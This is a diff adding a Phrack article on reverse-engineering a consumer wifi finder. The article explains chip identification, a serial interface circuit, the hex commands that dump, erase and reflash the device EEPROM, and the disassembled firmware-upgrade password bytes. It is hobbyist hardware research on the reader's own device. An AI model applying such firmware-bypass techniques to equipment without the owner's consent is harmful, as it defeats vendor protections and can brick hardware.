+M%F%,!3M-Z:_I>X.B%M&.D!#^.21#62J>W]+D-*08DC4)LD6X#)2);*H-9B\:
+M4A,N@CQ%-Y63Q3W*UO8RFMVL2/M*-I5(^D(B?::N;YT#>JP!PX8L&^\TI#M5
+MX'J\"F19Y"$)N2>!0?8?-`&G[&E]3G^9M0SPDT(&B<=3ID8X-9]I:@9&%-P]
+ME>(-):X28R&CQ9'59(9WDL),GJC*EJE^7^*I6#K93!^8Z2:SV=Y@MN.U-YC]
+M\B^*)QD']P:SO<%L;S#;&\P^RV!VHFUB019)RYD<U/,0MS2^:N-8B)D`'0(V
+M)C$1%(.K7A2]B1!ZJ<=KH@<T%]B;QO:FL>O=!K&]:6QO&MN;QO:FL>UYVIO&
+MMIK&8!@;8H(7Q-'/P6ZFBCCXLM8QRD^8W/X7C!LPD05$,,V0"DB9%6@N%H43
+M4FUMBYA$_TU?+VOC0N-)C674XG)C#*`6_C36LHS$!M308S*I3.D&1?N?U`.F
+M0B7`6F;;R93<^QI36=E:\6L9S!!2G!]6R80ZO*`PFU4-(_L]\?MK?^VOOY?K
+*?P")UUB.`+0^`+0^
+`
+end
+sum -r/size 33661/965395
+
+
diff --git a/phrack65/11.txt b/phrack65/11.txt
new file mode 100644
index 0000000..02f4933
--- /dev/null
+++ b/phrack65/11.txt
@@ -0,0 +1,979 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x0b of 0x0f
+
+|=-------------------=[ Hacking the $49 Wifi Finder ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[ by openschemes ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Contents
+
+1.0 - Introduction
+2.0 - Device Overview
+3.0 - Opening the Device
+4.0 - Internals and Investigation
+5.0 - Accessing the ISP Loader
+6.0 - ISP Loader Capabilities
+7.0 - Software Bootloader Capabilities
+8.0 - Inserting Your Own Code
+9.0 - Conclusion
+A.0 - References
+
+
+
+--[ 1.0 - Introduction
+
+  Christmas has passed, and in the cold weeks since we have already become
+bored with the shiny new toys Santa left us under the tree.  Our only
+choice is to hack them!  This article describes our successful attack on a
+popular wifi finder, and will provide you with the ability to use the
+device in new and interesting ways.  You are limited only by your own
+creativity!
+
+  Any successful hack must begin by setting a clear goal.  Through
+determination and creative thinking, you will then see the steps necessary
+to achieve that goal.  Simply saying "I would like to hack this device" is
+meaningless without context, and setting unachievable goals will cause you
+to be bogged down by the intermediate steps and probably abandon the
+project.  So we urge you to begin each hack by taking small steps, and upon
+the completion of each of these steps you will open new doors and new
+pathways for further investigation and development.
+
+  In the case of the wifi finder, our penultimate goal was to execute our
+own code on it's internal microcontroller.  We have achieved that goal and
+will describe the steps we took to achieve it.  It is easy to see that upon
+reaching this goal, we have opened many new pathways to extending the
+capabilities of the device.  Some are easy, such as allowing the device to
+seach hidden SSIDs and browse wifi channels not allowed in the US.  Others
+are lofty, such as the development of a portable "aircracking" device.
+Some of these topics will be covered in the future, but we urge you to sit
+down with the device and your knowledge of it, and plan your own path.
+
+  We apologize if you feel this text is a long, rambling description of our
+attack but we believe the PROCESS, and not the result is the true hack.
+Give a man a hack, and he can program his wifi-finder.  Teach a man to
+hack, and he can program anything...
+
+
+  The tools used in this attack are:
+- On the hardware side, we used a modified USB to RS232 converter to 
+communicate with the serial port on the wifi finder.  An alternative to 
+this is to build your own 3.3v RS232 converter using the MAX3232 IC.  
+Schematics for this are detailed below.
+
+- On the software side, we used a combination of IDA disassembler [1] and 
+Keil A51 assembler [2].  This assembler can be used from the command line, 
+or from within the Keil uVision IDE.
+
+  The main steps in this project are
+A) Open and identify the devices and their capabilities
+B) Research to find a back-door into the device
+C) Construction and operation of interface to communicate with the device
+D) Investigation into the device's internal operation
+E) Extension and modification of the device's operation
+
+  That is just a brief overview of the top-level scheme, and as you will
+soon discover, it requires quite a bit of low-level hacking in order to 
+achieve each of these steps in turn.  We hope that you will find this 
+text informative and enlightening as we chronicle our attack on this 
+interesting little device.
+
+
+
+--[ 2.0 - Device Overview
+
+  There are a few levels of wifi-finder on the market today.  Some cheap
+devices simply detect microwave radiation.  They will detect 802.11, but
+also some cordless phones, baby monitors, or the nondescript mom
+microwaving some soup down the street.  These are garbage, consisting only
+of an amplifier and bandpass filter.  The next level can detect access
+points, but give no feedback other than a few lights to tell you whether it
+is near or far.  Also garbage.
+
+  The highest tier of wifi-finder today costs between $40 and $100 USD, and
+consists of a standalone USB wifi card mated to a host microcontroller and
+LCD screen for display of the SSID, channel, and signal strength.  It
+contains a small lithium-ion battery for portable use, and charges itself
+anytime it is connected to a USB port.  You can easily identify this
+device, as it is the only wifi finder with an LCD screen!  This market has
+been cornered by one developer selling their design to many companies, so
+as of now there is only one true product which has been re-branded to many
+models.  In our investigations, we feel that all these devices are
+basically identical in hacking potential, and they are all suceptible to
+our attacks.  Here is a list of what we've found so far, all are available
+at your local store or online retailers such as Amazon.com.
+
+  Manufacturer    Model         Reference
+  ------------    ---------     ---------
+  Allnet          ALL-0298         [3]
+  ZyXel           AG-225H          [4]
+  ConnecTec       AG-225H          None
+  TrendNet        TEW-429UB        [5]
+  Linksys         WUSBF54G         [6]
+               
+  All the devices share a common form factor:  USB stick with an On-Off
+switch and two buttons for portable use: "Seek" and "Next".
+
+
+                Seek   Next
+   ______________==_____==______
+  |             ___________     |___
+  |            |           |      _ |
+  | HackMe     |    LCD    |      _ | USB
+  |            |___________|     ___|
+  |_____________________________|
+                     \_/
+                On-Off Switch
+
+
+  Powering on the device when it is disconnected from a PC will start the
+finder routine.  Additionally, pressing Seek at most times will restart the
+finder routine.  Once some hotspots have been found, pressing Next will
+cycle through them, displaying the SSID, Channel, Encryption Type, and
+signal Strength.
+
+  By holding Seek upon power-up, the device enters a simple self-test
+routine used to check the LCD screen and internal timing.  By holding Next
+upon power-up, the device enters a Firmware Upgrade Mode used to upload new
+firmware via USB.  Always a wonderful feature!  But don't think that we
+simply patch some boring vendor code and call it a hack:  For most of the
+devices we have found, this firmware upgrade mode has been obsoleted and is
+no longer able to upload to the host microcontroller.  We must find a new
+way into the micro, and they have not made it easy.
+
+
+
+--[ 3.0 - Opening the Device
+
+  The easiest device to open is the ZyXel/Allnet, followed by the Linksys
+and then the TrendNet.  By successively "cheapening" the manufacturing
+these vendors have inadvertantly made it a pain to get into the box without
+damaging it.  But we don't mind a little damage, and even a TrendNet with
+it's little tabs broken off can be closed back up and returned to the store
+without trouble. Not that you would ever do that, of course..  Just an
+example.
+
+  To open the device, you will need to remove the BACK panel (not the panel
+holding the LCD).  Start by pressing hard at the rear sides of the device,
+where the rear is the side WITHOUT the usb connector.  By pressing near 
+either of the back corners, you can get the ZyXel to pop open easily.  A 
+little prying with the cap can also work wonders and leave no marks.  The 
+TrendNet device is secured with 6 very cheap plastic tabs which will 
+easily break when you try to open it.  But the Trend it is the most 
+inexpensive device on the market so this is the one you will most likely
+try to attack.
+
+  Of course, you could always pry it open with a screwdriver if you don't
+care about getting it back together again.  
+
+  Once you get the device open, you will see that it consists of two
+circuit boards mated together by a 10-pin header.  The top board is secured
+by one small screw near the back of the device.  Feel free to throw the 
+screw away, or eat it, or something.  It's not needed.  The USB/wifi board
+contains a ZD1211 802.11 chip and the RF subsystem.  It is basically the
+same as a generic USB 802.11 adapter you would buy in the same form factor.
+After the screw is removed, you can grab the USB connector and wiggle this
+board up, freeing it from the 10-pin header that connects it to the bottom
+board.  The bottom board contains the focus of our attack, the mysterious
+WHFX30 microcontroller that seems to be the "brains" of the operation.
+
+
+  Here is a side view of how the boards fit together.  When viewed from
+above during disassembly, you will note that the wifi board has the
+components on the bottom, and the microcontroller board has the components
+on the top.  It is necessary to unconnect the boards to actually see any
+interesting components.
+
+                  Side View of the Wifi Finder Boards
+                
+
+                 RF (shielded)          ZD1211              USB
+Top Board     _____________________________________ _ __________
+                |______________|      \________/   |_|    |_____|
+                 ____________        _____         | |
+Bottom          |____________|--____/     \________|_|_
+Board              Battery          WHFX30      10-Pin Header
+
+
+
+--[ 4.0 - Internals and Investigation
+
+  As was previously mentioned, the entire top board can be used as a
+generic, standalone USB wifi card for your PC.  This architecture using the
+ZD1211 chipset is widely used, and to us: boring.  For knowledge on this
+board and the ZD1211 device, I refer you to the excellent work of the Linux
+community whose drivers and source code are freely available at [7].
+There you can browse the source to discover the USB endpoints, register
+setup of the ZD1211, promiscuous mode, channels, and other fine
+information.
+
+  But nowhere is there information on the "WHFX30" device...  It is a
+ghost, a semi-custom IC that holds the brains of the finder.  Since the
+vendor firmware updater is so limited, we must find a way to break into
+this mystery chip and get our own code onto it.
+
+  By researching the device online, we see some excellent starting points
+of our attack at J. Maushammer's investigation of the device [8].
+Mr. Maushammer was the first one to attempt to hack the device, and the
+owner of a great deal of initial information.  He hypothesizes that the
+WHFX30 contains an 805x microcontroller, and by disassembling one of the
+firmware updates this seems very likely.  He has also outlined some of the
+data blocks in the WHFX30 firmware, showing us the font table and power-on
+graphics but he goes no further.  Perhaps his goals were too lofty, or he
+became bogged down in the intermediate steps.  We are resolved to keep our
+goal clear: Get into the WHFX30.
+
+  By investigating the firmware updater file, we can see that only the 16k
+block of residing at 0x4000 is 8051 code.  However, it contains no jump
+vectors (that would reside at 0x0000) nor any interrupt service routines so
+it is probably NOT the entire 8051 program.  Additionally, the text strings
+for the self-test and firmware update routines are missing.  This brings us
+to the conclusion that the firmware updater is only allowed to touch a
+small portion of the device code: Specifically the finder routine.  It also
+tells us that the WHFX30 device probably contains more that 16k of code
+memory, which is a good thing for extending the capabilities.
+
+  We will take this opportunity to borrow Maushammer's pinout of the 10-pin
+header.  We can make up our own names, but it will be better to begin
+forming a standard on how we refer to the device.  Note that we are viewing
+the header socket on the bottom (WHFX30) board.
+
+
+ On-Off Switch
+-----/ \----------------
+             -----     |
+          1 | o o | 2  |
+          3 | o o | 4  |
+          5 | o o | 6  |
+          7 | o o | 8  |
+          9 | o o | 10 |
+             -----     |
+---\_/-----------------
+ "Next"
+
+ Pinout
+------
+J1)  Unknown (for now)
+J2) Scanning
+J3) Start of Scan
+J4) GND
+J5) GND
+J6) USB Data (obsolete?)
+J7) Serial data (ZD1211 TxD, WHFX30 RxD)
+J8) USB Data (obsolete?)
+J9) Serial Data (ZD1211 RxD, WHFX30 TxD)
+J10) USB Power to charger (when connected to PC)
+
+
+
+  When faced with a chip that you are not familiar with, it is best to
+collect as much information as possible and begin sifting down until you
+have a positive identification.  I feel that basically all devices will fit
+into one of three categories.
+
+  A) A production chip
+    - Information on these devices will be freely, or easily available.
+  
+  B) A semi-custom chip based on a production chip.
+    - Information MAY be available, depending on the secrecy of the
+      application.  For example, ATM machines often use generic, secure
+      8051 CPU's but noone will ever admit this to you.
+    
+  C) A full-custom chip.
+    - Only feasable for huge volume runs, like special graphics chips for
+      the new playstation.  Unless you work at Sony or Nvidia the
+      likelihood of getting any information on these chips is near 0.
+    
+
+  Our device is not an A, and this cheap USB toy does not warrant a C so we
+must be stuck in B: Probably an off-the-shelf (but re-marked) chip, or at
+least based on one.
+
+  An example of a B-type is a neat CPU I've seen in Japanese slot machines.
+Way too many pins to be a normal CPU, but the surrounding circuitry is too
+crude to be anything else.  What did that one turn out to be?  Well it's a
+generic 8032 microcontroller with a generic EEPROM chip in the same
+package.  It's only made for that manufacturer of Pachislo machines, but
+internally it's all off-the-shelf stuff.  I guess the theory is that by not
+knowing what it is, users and competitors won't be able to access it?
+WRONG!  Obscurity does not create security.  That device can be read and
+written with a standard EEPROM burner once the pinout is known.
+
+  But back to our little wifi-finder.  We can trace the locations of VDD
+(the power supply) and GND pins, and we know it has an RS232 port on a few
+other pins.  A few pin locations is often good enough to discover the
+identity of an "easy B" - a standard device that is simply marked as
+something else.  For this guy, that's no good.  There are too many 805x
+derivatives with too many pinouts for us to make a positive identification.
+
+  We need some additional information.  You could try social engineering,
+but it seems the vendors are also unaware of the internals of the WHFX30
+and the original design house is under confidentiality to the vendors so
+you are probably out of luck here.
+
+  It's at this point that one of our members resorted to a bit of a dirty
+trick in the investigation of the WHFX30.  It's called "Decap", and it is
+basically when a hole is etched into the top of the plastic IC package
+using strong acid so you can look at the chip inside.  We do not recommend
+you try this yourself, as it is obvously dangerous and is likely to damage
+the board if you are not careful!  But for a small fee of $50-$100, there
+are companies that can decap your IC even when it is attached to a PCB.
+You can find one of these companies by searching some terms such as "SEM"
+(scanning electron microscope), "FIB" (focused ion beam), "Decap", "IC
+Failure Analysis".  They will be happy to decap your IC for a nominal fee,
+and usually laugh and joke with you if you bring in an ipod or some other
+high value item.  I find that they are not laughing because you want to
+decap some of Apple's proprietary chips, but that they have already done it
+so many times they would rather just tell you what's inside.  Cheeky
+bastards!
+
+  After the WHFX30 was decapped, it was examined with a microscope to find
+the logo of the manufacturer: Macronix.  The manufacturer will almost
+always put a logo and trademark on the IC, unless it is a matter of great
+security or so damn cheap (like a blinkey toy) that the logo is omitted.
+With the manufacturer's name, it was an easy job to research Macronix's
+products until we found one that matched the pinout and capabilities of the
+WHFX30: MX10E8050A.  You can download the datasheet of this device from
+Keil, who makes a nice compiler/debugger suite called microvision (uVision)
+that you will probably use later.  The MX108050A datasheet is available
+at [9].
+  
+
+  The MX10E8050A is a low-level 8051 clone that offers a few GPIO ports, a
+UART, 2k of internal RAM, and a nice big 64k EEPROM (broken into 4x 16k
+blocks) for code storage.  Just this little bit of knowledge helps us
+decipher what the funny 0x4000 offset in the firmware upgrader is for:  You
+can only erase this EEPROM in 16k blocks, and can not (should not?) erase a
+block that you are executing code from.  So in order to have a "Firmware
+Upgrade Mode", the designers must have put those routines along with the
+jump vectors and interrupt service routines down in the first block of
+EEPROM, from 0x0000-0x3FFF.  Next comes the hotspot finder routines in
+0x4000-0x7FFF, and the upper two blocks are unused.  NOTE: Actually they
+are scratchpad memory for writing the new firmware to before flashing it to
+0x4000, but let's not get into it.
+
+
+
+--[ 5.0 - Accessing the ISP Loader
+
+  At this point, things are unraveling fast.  We have completed our
+intermediate goals of investigating and identifying our target, and a
+little browsing of the MX10 datasheet tells us that there is a deeper
+bootloader hardwired into ROM in each device.  That is usually the case in
+8051 clones, and large smiles came to our faces as we learned how to bring
+it to life.
+
+  We are close to our main goal now, and should soon have the ability to
+dump and overwrite the entire 64k of EEPROM with a little help from the ISP
+Loader.  But we need a way to talk to the device, as well as a way to
+exceute a special startup sequence required to activate this factory ROM
+loader.  Let's start with the power-up sequence.  The datasheet tells us
+that if we hold the !PSEN pin low, ALE pin and !EN pin high while leaving
+reset we will enter the ISP loader.  
+
+  EA is held high by the board, and ALE will default to high when !PSEN is
+forced low so really we only need to hold !PSEN low.  We started by
+stabbing it with a grounded needle, which works but risks damaging the 
+I/O circuitry in the abused pin.  A little tracing of the PCB showed us 
+that J1 on the 10-pin header is used as a !PSEN pulldown during a small
+power-on delay.  So it's simple!  We just ground J1 by connecting it to J4,
+and power-up the device.  Boom! We've hit the loader!
+
+  When the loader is active, the RS232 port on the WHFX30 is used to
+transfer commands and EEPROM data.  However, it is a 3.0v, 0v logic signal
+instead of the -12v, 12v signals used by the RS232 port in your PC.  DO NOT
+connect your PC to the finder without a suitable interface or you will blow
+the WHFX30.  Since the WHFX30 required 3v logic levels, you can use the 3v
+version of the popular MAX232 chip, the MAX3232.  Get the datasheet from
+Maxim [A].
+
+
+You will need the '3232 IC, five 0.1uf capacitors and either a chopped-off
+RS232 cable or an RS232 connector. I will describe the circuit here, as
+ASCII schematics always leave something to be desired.  In this circuit 
+description, some common names are used that are explained here.  VCC or
+VDD is the supply voltage for the device, here 3.0v or 3.3v.  GND is the
+ground of the device.  RxD is the recieving input, and TxD is the 
+transmitting output.  Both the PC and the finder have TxD and RxD lines,
+so this interface IC is used to connect the PC's TxD to the finder's
+RxD and vice versa.  That should help you keep it clear when wiring the
+chip.
+
+Wiring steps:
+A) Connect your 3v power supply to pin 16. 
+NOTE: Connect a cap (C5)from VCC to GND to filter noise.
+B) Connect your power supply GND to pin 15.
+NOTE: Connect this GND to WHFX30 GND on J4 of the 10-pin header.
+C) Pump capacitor C1 connects from pin 1 to pin 3.
+D) Pump capacitor C2 connects from pin 4 to pin 5.
+E) Reservoir cap C3 connects from pin 2 to GND
+F) Reservoir cap C4 connects from pin 6 to GND.
+NOTE: Cap C4 has negative polarity, so the + side connects to GND.
+G) RS232 RxD (Pin 2 on a 9-pin RS232 connector) connects to pin 14
+H) RS232 TxD (pin 3 on a 9-pin RS232 connector) connects to pin 13
+I) WHFX30 RxD (Pin J7 on the 10-pin header) connects to pin 12
+J) WHFX30 TxD (Pin J9 on the 10-pin header) connects to pin 11
+
+
+              MAX3232 Interface
+  
+                   ___ ___
++-----)|--- C1+  -|1  U 16|-  Vcc ---|(---GND
+|  GND--)|-- V+  -|2    15|-  GND --------GND
++---------- C1-  -|3    14|-  T1out ---> RS232 RxD (RS232 p2)
+ +---)|---- C2+  -|4    13|-  R1in  <--- RS232 TxD (RS232 p3)
+ +--------- C2-  -|5    12|-  R1out ---> WHFX30 RxD (Header J7)
+   GND--|(-- V-  -|6    11|-  T1in  <--- WHFX30 TxD (Header J9)
+          T2out  -|7    10|-  T2in
+           R2in  -|8     9|-  R2out
+                  |_______|
+                
+
+  As an alternate route, you can buy a cheap USB-RS232 converter and just
+tap into the 3v RxD, TxD pins, saving yourself the trouble of building the
+MAX3232 circuit.
+
+                
+
+--[ 6.0 - ISP Loader Capabilities
+
+  OK, you have built and tested your interface board, and connected it to
+the wifi finder.  You have jumpered J1 and J4 to enable the bootloader, and
+you have powered up the wifi finder while hyperterminal runs on your PC.
+What now?
+
+  At first, the device will send nothing or a garbage character.  It's
+waiting for the uppercase "U" in order to detect and configure the baud
+rate.  After sending a few "U"'s to the device, it will begin echoing
+characters back.  You are now talking to the ISP loader.
+
+  It is at this point that we note a discrepancy in the datasheet.  Maybe
+our device is not exactly a MX10E8050A, or maybe they screwed up.  The
+datasheet says that either ASCII or binary records can be sent.  We find
+that it only responds to binary records (so hyperterminal is somewhat 
+limited). But the commands listed in the datasheet are accurate, you just
+need to send them in binary form, not ASCII.  Go get a comms program from
+the openschemes site listed at the end of the article.
+
+  The records you will send are based on the Intel Hex Record format that
+you may have seen in those .HEX files from your compiler.  But this device
+uses an extended set to include commands.  The format is the same, though.
+Details of the hex record format are available at reference [B] below.
+
+Generic hex record format
+: nn aa aa rr dd ... dd cc <crlf>
+
+Number  Data        Description
+------  ----        ------------
+1)      0x3A        (The ":" character) starts a record.
+2)      0xnn        The number of data bytes in the command.
+3-4)    0xaa, 0xaa  Address of the location to access, or 00,00 otherwise
+                    otherwise
+5)      0xrr        The record type (or command type)
+6-n)    0xdd.....   Data Packet, of length described in byte #2.
+n+1)    0xcc        2's complement checksum.  Sum, (exept :), mod FF,
+                    invert-1
+
+  So upon receipt of a complete command, the device will either respond
+with a "." to indicate good checksum, or an "X" to indicate bad checksum.
+The only other response would be an "R", if you attempted to write data but
+it was not successfully written.  We've never recieved one unless we
+attempted to write before the EEPROM was erased. 
+
+
+  Some nice commands are offered in the datasheet, and we've come up with
+some others.  We will print them as hex strings, because the ASCII looks
+like garbage!  A typical set of commands may be the sequence that follows.
+
+---------------------------------------------------------------------------
+1) Dump EEPROM.
+0x3A, 0x05, 0x00, 0x00, 0x04, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xF9
+
+Description: Read EEPROM (0x04) from location 0x0000 to 0xFFFF, checksum
+0xF9. 
+
+  This beauty dumps the entire contents of the WHFX30 code memory to
+the serial port.  This is the first command you will want to use, in order
+to get a clean copy of the 64k EEPROM in case you screw it up later.
+
+---------------------------------------------------------------------------
+2) Full Chip Erase
+0x3A, 0x01, 0x00, 0x00, 0x03, 0x07, 0xF5
+
+Description: Erase all EEPROM blocks (0x03) + Status byte and Boot vector,
+checksum:0xF5.
+
+  You can also do block-wise erase, but this command will clear everything
+in the chip, which is our preferred method.  Please note that you will
+need to re-write the boot vector after erasing, otherwise the chip will
+be stuck in the ISP loader.
+
+---------------------------------------------------------------------------
+3) Blank Check Device
+0x3A, 0x05, 0x00, 0x00, 0x04, 0x00, 0x00, 0xFF, 0xFF, 0x01, 0xF8
+
+Description: Blank check (0x01) the device from 0x0000 to 0xFFFF
+
+  You can't successfully program EEPROM with data in it, so you will want
+to blank check it.  This takes several seconds if it's going to pass, but
+if you fail it will fail as soon as the chip finds any data.  Cool!
+
+---------------------------------------------------------------------------
+4) Program Data
+0x3A, 0x10, 0x00, 0xhh, 0xll, 0x00, 16 Data bytes, Checksum
+
+Description: Program EEPROM (0x00) at location 0xhhll with the following
+bytes.  First byte is the data length.  Here we use 0x10 for 16 bytes but
+that can be changed.  Please note you will need to calculate the checksum
+on the fly, and the checksum summation does NOT include the first byte,
+0x3A.
+
+If you don't know how to make intel checksums, here you go:
+
+a) Sum bytes mod 256 (or sum in a byte-wide variable and let it roll over)
+b) Convert to 2's complement.  A cheat for this if you don't want to look
+it up is to subtract your sum from 256 (0x100), or leave as 0 if the
+sum turned out to be 0x00.
+
+For those of you unfamiliar with 2's complement, it is the number required
+to make the entire sum equal 0x100.  So for a summation total of 0x7E, our
+checksum would be 0x82.  Since we are doing byte-wide checksum, a sum
+total of 0x17E or 0x217E would also use a checksum of 0x82, since it is 
+only the last byte that counts.  If the sum total is some multiple of
+0x100, then the checksum would be 0x00.
+
+
+---------------------------------------------------------------------------
+5) Erase Boot Vector and Status Byte
+0x02, 0x00, 0x00, 0x03, 0x04, 0x00, 0xf7
+
+Description: Erase (0x03) the BV/Status byte (0x04) after programming is
+completed in preparation for restoring default values.
+
+
+  After programming, the device will have status and BV set to continue
+booting into the ISP loader.  In order to return the chip to normal mode
+(booting into EEPROM), we need to clear and rewrite the BV manually. 
+Please note that after clearing these bytes, it is very important that you
+successfully re-write the BV to it's default value or you will effectively
+DISABLE the ISP loader and will never get back into it.  If you are having
+problems writing the BV, simply do a full-chip erase to get out of this
+dangerous condition.  But NEVER power down if you are stuck at step 5.
+
+---------------------------------------------------------------------------
+6) Write Boot Vector
+0x03, 0x00, 0x00, 0x03, 0x06, 0x01, 0xFC, 0xF7
+
+Description: Write (0x03) boot vector (0x01) to value 0xFC (for 0xFC00),
+checksum: 0xF7.
+
+  This resets the boot vector to the default value of 0xFC00.  Do not
+power down the device between steps 5 & 6, or the boot vector will be
+stuck at 0x0000, running the programmed EEPROM always and disabling
+your ability to hit the ISP loader ever again.  
+
+---------------------------------------------------------------------------
+
+  We will assume at this point that you have dumped out the entire 64k of
+EEPROM that exists in the device.  A measly 16k will match the data you can
+find in the vendor's firmware upgrade file, which leaves us with MOST of
+the data still an unknown.  Fear not, intrepid hacker - we will now frame
+out the location and function of this code EEPROM for you.
+
+  The 64k EEPROM is divided into four logical blocks of 16k each.  This 
+partitioning is provided by the manufacturer to allow the chip to erase and
+reprogram itself in a limited manner.  In all the firmwares investigated, 
+the partitioning follows the scheme here  
+
+Partition   Logical Address  Function
+---------   ---------------  --------
+    1         0000h-3FFFh    Bootloader and Self-Test Routines
+    2         4000h-7FFFh    Hotspot Finder Routines    
+    3         8000h-BFFFh    Scratchpad 1 - Wifi Data??  Still unsure..
+    4         C000h-FFFFh    Scratchpad 2 - Updater Scratchpad    
+    
+  As is the case with most 8051 microcontrollers, typical execution from
+power-on or reset begins at 0000h in partition 1.  Here the micro will
+first clear RAM and check for corrupted memory before checking the state
+of the buttons.  If either self-test mode or bootloader buttons are 
+depressed, the micro will operate exclusively in partition 1.  In the 
+"Firmware Upgrade Mode" located in this partition, the micro can erase
+and re-write the other blocks.  For example, when a new finder routine is
+uploaded in firmware upgrade mode, the micro first erases the C000 block
+and writes the downloaded data here.  If the checksum is good, the 4000 
+block will be erased and the new finder routine written there.  
+
+  The second partition is the hotspot finder routine, which is what you
+see executing whenever the device is actively looking for hotspots.  If
+no buttons are held down upon power-up, we will jump over the bootloader
+and continue in the finder routine in this block.
+
+  The third partition is used as scratchpad, but it's function is not
+100% determined.  We suspect that it is used to write wifi data but our
+notes on this are not verified.
+
+  The fourth partition is used as scratchpad during firmware upgrade mode
+to write the new finder firmware temporarily.  Upon entrance into the
+firmware upgrade mode, the C000 block is erased.  As new firmware is sent
+to the device, it is written here first.  After a successful transfer, 
+this data is checksummed for validity.  If valid, the 4000 block is then
+erased and this data copied there for permanent use as the new finder
+routine.  This simplified upgrade is a bit safer since it is downloaded 
+and checksummed before any upgrade is performed, so this will be the 
+focus of our next section.     
+
+
+--[ 7.0 - Software Bootloader Capabilities
+
+  For those who are wary of erasing and fooling with the EEPROM at it's
+lowest levels, we can also communicate with the software bootloader, also
+known as "Firmware Upgrade Mode".  It is limited to working on the 16k
+block of EEPROM residing at 0x4000 (the finder routines), but this is still
+useful in some cases.  It's a good alternative for those who don't want to
+risk corrupting the device memory or boot vector.  I consider it very safe,
+because the software bootloader itself resides in the 0x0000 block,
+separated from the writing and erasing being done at 0x4000 and above.  So
+in no case could you lose the ability to go back to the original EEPROM.
+
+  When we power up the device (with no J1-J4 jumper) with the "Next" button
+held down, the software bootloader runs as previously discussed.  The
+serial port is automatically configured to 115.2k, 8n1 and the device will
+begin outputting characters.  It intends to speak to the ZD1211, but we can
+simply attach our RS232 interface and communicate with it directly.
+
+  I will not go into all the details here, but we had to disassemble the
+bootloader itself to find the commands and communication sequence.  You can
+do the same, if you like.  Or, a small program to read and write the device
+using firmware upgrade mode is available online.  A quick overview of a 
+partial disassembly shows some details we used in development of our
+program.
+
+  Upon entrance into firmware upgrade mode, the device sends 8 0x00 bytes 
+to the serial port to show it is alive, and then 8 0xA6 bytes to flag that
+it is about to erase the 0xC000 block.  After erasing the scratchpad block
+the device sends 8 0xA7 bytes.  Finally, it sends 8 0x11 bytes as the 
+equivalent of a "command prompt".  A good command will be executed, and a 
+bad command will be ignored and will get us to another 8 0x11 bytes.
+
+Although all instructions are not shown, you can see the operation of each
+of these sections by our comments here.
+
+Snippet 1: Send the 0xA6's, erase the 0xC000 block and send the 0xA7's.
+NOTE: All 8 transmissions of 0xA6 and 0xA7 are not shown, but you get
+the picture.
+
+053A 7F A6      mov     R7, #0xA6  ; Load 0xA6
+053C 12 28 A0   lcall   SerialOut0 ; Send it to the serial port
+053F 7F A6      mov     R7, #0xA6  ; Load 0xA6
+0541 12 28 A0   lcall   SerialOut0 ; Send it to the serial port
+0544 7F C0      mov     R7, #0xC0  ; Load 0xC0 for erasing 0xC000 block
+0546 12 29 3C   lcall   Do_IAP_ERASE ; Do the IAP Rom call to erase 0xC000
+0549 7F A7      mov     R7, #0xA7  ; Send 8x 0xA7 to signify erasure done
+054B 12 28 A0   lcall   SerialOut0
+054E 7F A7      mov     R7, #0xA7
+0550 12 28 A0   lcall   SerialOut0
+0553 7F A7      mov     R7, #0xA7
+0555 12 28 A0   lcall   SerialOut0
+... And so on ...
+
+
+Snippet 2: Sending last few 0x11 bytes of the command prompt, and the
+inspection of the "password" and command.
+
+058F 7F 11      mov     R7, #0x11  ; Load 0x11
+0591 12 28 A0   lcall   SerialOut0 ; Send it to the serial port
+0594 7F 11      mov     R7, #0x11  ; Load 0x11
+0596 12 28 A0   lcall   SerialOut0 ; Send it to the serial port
+0599 12 29 A2   lcall   SerIn_OneByte     ; Get one byte from serial port
+059C BF AA D2   cjne    R7, #0xAA, L_571  ; If byte is not 0xAA, bail out
+059F 12 29 A2   lcall   SerIn_OneByte     ; Get one byte from serial port
+05A2 BF 77 CC   cjne    R7, #0x77, L_571  ; If byte is not 0x77, bail out
+05A5 12 29 A2   lcall   SerIn_OneByte     ; Get one byte from serial port
+05A8 8F 28      mov     RAM_28, R7   ; Store it in location 28
+05AA E5 28      mov     A, RAM_28    ; Store it in A as well
+05AC 64 A5      xrl     A, #0xA5     ; XOR it with 0xA5
+05AE 70 2B      jnz     L_5DB        ; If NOT 0xA5, continue to "Erasing"
+05B0 7F A5      mov     R7, #0xA5    ; Otherwise echo 0xA5's as ack
+05B2 12 28 A0   lcall   SerialOut0
+05B5 7F A5      mov     R7, #0xA5
+05B7 12 28 A0   lcall   SerialOut0
+
+  We can see that the bootloader requires a "password" of 0xAA, 0x77 in 
+order to get to the beginnings of the command interpreter.  Afterward, it
+is looking for the 0xA5 byte to start an upload.  Once it gets an 0xA5, 
+it will echo 8 0xA5's back to the host and continue on to the "Recieving"
+routine.
+
+  You will note that these function names are our own, and are obviously 
+not embedded in the firmware.  Feel free to make up your own names and
+comments if you decide to disassemble the code yourself.  Furthermore,
+you will note that in order to erase the 0xC000 block, we must use the
+device's internal ROM calls.  This is an interesting feature supplied
+by the IC vendor to make EEPROM programming easier.  The details of the
+IAP rom calls are listed in the datasheet, and we will show a short
+snippet of the Do_IAP_ERASE call here, just for clarity.
+
+293C Do_IAP_ERASE:
+293C 8F 2F        mov     RAM_2F, R7      ; Get the address to erase
+293E 75 F8 5A     mov     SFR_F8, #0x5A   ; Write ROM Security code
+2941 43 A2 20     orl     FIE, #0x20      ; Set ENBOOT to enable IAP ROM
+2944 79 01        mov     R1, #1          ; Function 0x01 (ERASE EEPROM)
+2946 8F 83        mov     DPH, R7         ; High byte of address into DPH
+2948 75 82 00     mov     DPL, #0         ; Low byte of address into DPL
+294B 12 FF F0     lcall   L_FFF0          ; Execute the IAP ROM Call
+294E FF           mov     R7, A           ; Store the result in R7
+294F 53 A2 DF     anl     FIE, #0xDF      ; Clear the ENBOOT flag
+2952 53 F8 00     anl     SFR_F8, #0      ; Clear the ROM  security code
+2955 22           ret
+2955 ; End of function Do_IAP_ERASE
+ 
+  It's interesting because there is no actual code at location FFF0, but
+rather this location has been remapped to an internal function supplied
+by the manufacturer of the IC.  We enable this remap by writing a password
+and setting the ENBOOT bit.  As was mentioned, the details are in the
+datasheet, but this is the general procedure to call the IAP functions with
+your desired command in register R1.
+
+
